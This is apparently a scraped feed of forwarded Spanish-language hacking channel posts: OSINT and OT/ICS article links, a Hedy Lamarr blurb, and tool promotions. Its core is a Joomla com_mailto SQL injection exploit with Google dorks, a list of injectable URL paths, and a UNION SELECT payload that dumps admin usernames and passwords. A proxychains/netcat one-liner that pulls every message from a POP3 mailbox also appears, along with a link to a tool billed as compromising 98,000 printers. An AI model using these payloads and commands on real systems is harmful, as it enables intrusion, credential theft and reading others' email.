Forwarded from 「Drok3r」
Rastreo de un banco offshore y un servicio web oscuro mediante blockchain: una investigación OSINT
https://medium.com/coinmonks/tracing-an-offshore-bank-and-a-dark-web-service-using-the-blockchain-an-osint-investigation-a1000251c3ec
https://medium.com/coinmonks/tracing-an-offshore-bank-and-a-dark-web-service-using-the-blockchain-an-osint-investigation-a1000251c3ec
Medium
Tracing an offshore bank and a dark web service using the blockchain — an OSINT investigation
A how to guide on analysing dark web sites using an onion crawler and analyse their blockchain relationship of bitcoin transactions
Forwarded from 「Drok3r」
Joomla Mailto Components 1.2.2.2 SQL Injection
# Author [ Discovered By ] :
SQL Injection Exploit
Example SQL Injection Exploit Payload
Example SQL Database Error
# Author [ Discovered By ] :
KingSkrupellos# Google Dorks :
inurl:''/index.php?option=com_mailto''# PacketStormSecurity :
packetstormsecurity.com/files/authors/13968
SQL Injection Exploit
/index.php?option=com_mailto&tmpl=[SQL Injection]
/index.php?option=com_mailto&tmpl=component&link=[SQL Injection]
/index.php?option=com_mailto&tmpl=component&type=raw&link=[SQL Injection]
/index.php?option=com_mailto&tmpl=mailto&article=[SQL Injection]&Itemid=1
/index.php?option=com_mailto&tmpl=mailto&article=[ID-NUMBER]&Itemid=[SQL Injection]
/index.php?option=com_mailto&tmpl=component&template=gantry&link=[SQL Injection]
/index.php?option=com_mailto&tmpl=component&template=skyextend-fjt&link=[SQL Injection]
/index.php?option=com_mailto&tmpl=component&template=kallyas&link=[SQL Injection]
/index.php?option=com_mailto&tmpl=component&template=ca_cloudbase2_j25&link=[SQL Injection]
/index.php?option=com_mailto&tmpl=component&template=jf_texturia&link=[SQL Injection]
/index.php?option=com_mailto&tmpl=component&template=jsn_boot_pro&link=[SQL Injection]
/index.php?option=com_mailto&tmpl=component&template=jm-business-marketing&link=[SQL Injection]
/index.php?option=com_mailto&tmpl=component&template=findario1.7&link=[SQL Injection]
/index.php?option=com_mailto&tmpl=component&template=beez_20&link=[SQL Injection]
/index.php?option=com_mailto&tmpl=component&template=allrounder-j1.6&link=[SQL Injection]
/index.php?option=com_mailto&tmpl=component&template=siteground-j16-41&link=[SQL Injection]
/index.php?option=com_mailto&tmpl=component&template=nagariknews&link=[SQL Injection]
/index.php?option=com_mailto&tmpl=component&template=sarmuni&link=[SQL Injection]
Example SQL Injection Exploit Payload
+and+1=2+union+select+concat(username,char(58),password)administrator+from+jos_users--
+and+1=2+union+select+concat(username,char(58),password)administrator+from+jos_users--&Itemid=1
Example SQL Database Error
Strict Standards: Non-static method JLoader::import() should not be called statically in /home/hellfire/public_html/libraries/joomla/import.php on line 29
Strict Standards: Only variables should be assigned by reference in /web/htdocs/www.xxx.it/home/templates/it_thelodge3/component.php on line 12
Strict Standards: Accessing static property JCache::$_handler as non static in /web/htdocs/www.xxx.it/home/old_site_2015/libraries/joomla/cache/cache.php on line 420
Forwarded from ..
One liner para jalar todos los emails de un buzón..
echo "USER auser@mail.server\nPASS password2018\n$(for n in {1..344}; do echo RETR $n; done)" | proxychains nc -vv mail.server.addr 110 | tee -a auser-email.txtWHAT DOES “INSECURE BY DESIGN” ACTUALLY MEAN FOR OT/ICS SECURITY?
https://www.langner.com/2019/03/what-does-insecure-by-design-actually-mean-for-ot-ics-security/
https://www.langner.com/2019/03/what-does-insecure-by-design-actually-mean-for-ot-ics-security/
OTbase by Langner
What does "insecure by design" actually mean for OT/ICS?
Learn about the nasty vulnerabilities which are concealed by NIST and vendors
Hedy Lamarr, precursora del wifi y el bluetooth
La que fuera una de las chicas más seductoras de la gran pantalla en Hollywood, hasta el punto de ser considerada como "la mujer más hermosa de Europa" por el director Max Reinhardt, ayudó a inventar la tecnología en la que se basa el wifi moderno. Mientras trabajaba con el compositor vanguardista George Antheil, Lamarr patentó una versión temprana de comunicación de espectro ensanchado, que es parte de la base de tecnologías inalámbricas como Bluetooth y wifi. A ella y a Antheil se les ocurrió la idea de ayudar a crear un código irrompible para submarinos durante el tiempo de Segunda Guerra Mundial, pero la amplia aplicación de su invención no fue reconocida hasta más tarde.
La que fuera una de las chicas más seductoras de la gran pantalla en Hollywood, hasta el punto de ser considerada como "la mujer más hermosa de Europa" por el director Max Reinhardt, ayudó a inventar la tecnología en la que se basa el wifi moderno. Mientras trabajaba con el compositor vanguardista George Antheil, Lamarr patentó una versión temprana de comunicación de espectro ensanchado, que es parte de la base de tecnologías inalámbricas como Bluetooth y wifi. A ella y a Antheil se les ocurrió la idea de ayudar a crear un código irrompible para submarinos durante el tiempo de Segunda Guerra Mundial, pero la amplia aplicación de su invención no fue reconocida hasta más tarde.
Una herramienta curiosa la cual nos permite cifrar archivos, lo que hace "especial" esta herramienta es que ademas de necesitar una contraseña, solo se pueden decifrar los archivos si el usuario se encuentra en alguna IP o a través de geolocalización
https://dataconfidence.com/smartencrypt/
https://dataconfidence.com/smartencrypt/
Curiosa herramienta escrita en python con la cual se pueden comprometer 98000 impresoras expuestas
Link [ https://github.com/KAISTEP/HACKPRINTERS ]
Link [ https://github.com/KAISTEP/HACKPRINTERS ]